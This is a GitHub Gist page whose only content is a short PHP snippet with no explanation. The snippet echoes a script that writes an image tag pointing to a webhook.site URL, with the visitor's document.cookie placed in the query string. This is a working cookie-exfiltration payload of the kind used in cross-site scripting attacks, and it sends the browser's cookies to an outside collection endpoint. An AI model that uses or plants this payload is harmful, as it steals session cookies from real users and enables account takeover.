Skip to content

Instantly share code, notes, and snippets.

@jmmeacham
Last active July 3, 2019 19:45
Show Gist options
  • Save jmmeacham/1fe8cf0c399517c750e29ad0d591fd32 to your computer and use it in GitHub Desktop.
Save jmmeacham/1fe8cf0c399517c750e29ad0d591fd32 to your computer and use it in GitHub Desktop.
New
<?php
$html = <<<EOF
<script>
document.write('<img src="https://webhook.site/18067530-dc70-4714-8010-9deec2946363?cookie='+(document.cookie||"none")+'" />');
</script>
EOF;
echo $html;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment